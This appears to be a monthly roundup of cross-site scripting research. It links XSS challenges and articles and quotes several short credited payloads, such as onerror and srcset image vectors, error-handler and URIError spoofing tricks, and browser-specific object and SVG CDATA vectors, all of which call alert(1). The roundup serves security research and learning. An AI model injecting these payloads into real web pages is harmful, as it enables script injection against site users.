May XSS challenge by Intigriti challenge-0525.intigriti.io

Interesting - although non-conforming - payload by Simon Pieters <picture><source srcset=1><img onerror=alert(1)></picture>

An img tag payload without src, by Gareth Heyes \u2028 <img srcset=1 onerror=alert(1)>

Eclipse on Next.js: Conditioned exploitation of an intended race-condition, nice exploitation of Next.js race condition leading to stored XSS, by zhero; zhero-web-sec.github.io/research-and-t…

Breaking Out of Restricted Mode: XSS to RCE in Visual Studio Code, nice finding by Devesh Logendran starlabs.sg/blog/2025/05-b…

Full-Width Symbols, a useful cheatsheet to bypass WAF by Anton

XSSing TypeErrors in Safari, nice finding by Gareth Heyes \u2028 thespanner.co.uk/xssing-typeerr…

An URIError spoofing-based vector, by 0x999 🇮🇱 inspired by terjanq ondevicemotion=setTimeout; Event.prototype.toString=URIError.prototype.toString; Event.prototype.message='alert\x281\x29'

A payload that plays with error handlers by 0x999 🇮🇱 <img/src/onerror=window.onerror=eval;ReferenceError.prototype.name=';alert\x281\x29;var\x20Uncaught//';z>

A firefox payload by Gareth Heyes \u2028 <object data="# alert(1)" codebase=javascript://> Inspired by Masato Kinugawa x.com/kinugawamasato…

A payload that is also a valid PDF file, by xssdoctor x.com/xssdoctor/stat…

Make Self-XSS Great Again, an interesting article by slonser blog.slonser.info/posts/make-sel…

A payload for Chrome and Forefox by Gareth Heyes \u2028, found with Hacking Rooms: thespanner.co.uk/hacking-rooms <svg><title><![CDATA[--></title><img src onerror=alert(1)>]]>

June XSS challenge by Intigriti challenge-0625.intigriti.io